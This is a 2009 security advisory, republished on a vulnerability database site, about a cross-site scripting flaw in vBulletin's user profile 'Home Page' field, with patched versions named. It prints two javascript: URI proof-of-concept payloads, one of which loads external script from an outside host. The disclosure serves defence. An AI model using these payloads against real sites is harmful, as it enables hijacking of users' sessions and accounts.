Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22577
HistoryOct 09, 2009 - 12:00 a.m.

vBulletin - Multiple Versions - Cross Site Script Redirection

2009-10-0900:00:00
vulners.com
22
JSON

vBulletin - Cross Site Script Redirection

Versions Affected: 3.8.4 / 3.7.6 / 3.6.12
Patches Available: 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

Info: An XSS flaw within the user profile page has recently been discovered.
This could allow an attacker to carry out an action as a user or obtain
access to a user's account. To resolve this issue, it has been necessary to
release a patch level version of the active versions of vBulletin.

The upgrade process is the same as previous patch level releases - simply
download the patch from the Members Area, extract the files and upload to
your webserver, overwriting the existing files. There is no upgrade script
required.

As with all security-based releases, we recommend that all customers
upgrade as soon as possible in order to prevent any potential damage
resulting from the flaw being exploited.

Credits: The original finder of the security hole. (Jelsoft?)

Researched & Disclosed by: MaXe (InterN0T.net)

Official Information:
http://www.vbulletin.com/forum/showthread.php?t=319572

-:: The Advisory ::-
The "Home Page" field in the user profile was only checking the user input
for either "www" or the following regular expression written in normal text:
Any letter from A to Z and/or a number from 0-9 + :// will make the link valid.

The output in the Home Page field is encoded with most likely htmlspecialchars(),
however before the patch it did not check if a user would create a link that
would send an unknowing user to either the data: or javascript URI scheme.

The only limits in the Home Page field are:

  • 90 character limit
  • Characters will be converted to html entities.
  • We can only use the data or javascript URI scheme.

This means that we should avoid " since that becomes " … The other
characters like < will become &lt; which is %3C which is almost the same.
Please see how htmlentities() and htmlspecialchars() works in PHP.

The following scheme input as home page will alert 0:
javascript://%0adocument.write('<script>alert(0)</script>')

The following scheme is a Proof of Concept that external Javascript can be loaded:
javascript://%0adocument.write('<script src=http://intern0t.net/.k&gt;&lt;/script&gt;&#39;&#41;

The following URL contains a working Proof of Concept on the Contact Page:
http://forum.intern0t.net/members/maxe.html (will be removed soon)

-:: Solution ::-
Update to the newest version of vBulletin - 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

-:: Conclusion ::-
vBulletin is generally a safe and secure platform to use for large forums.
This security hole / exploit is implausible to actually work against people.
Please see: http://forum.intern0t.net/blogs/maxe/62-having-fun-cross-site-scripting.html for
in-depth information.

Disclosure Information:

  • Unknown date of when the vendor found the security hole.
  • Vendor released patch on the 7th October 2009.
  • Security hole researched and disclosed on 8th October 2009.

Disclosure Reference:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1502-vbulletin-3-8-4-cross-site-script-redirection.html

All of the best,
MaXe - Founder of InterN0T

JSON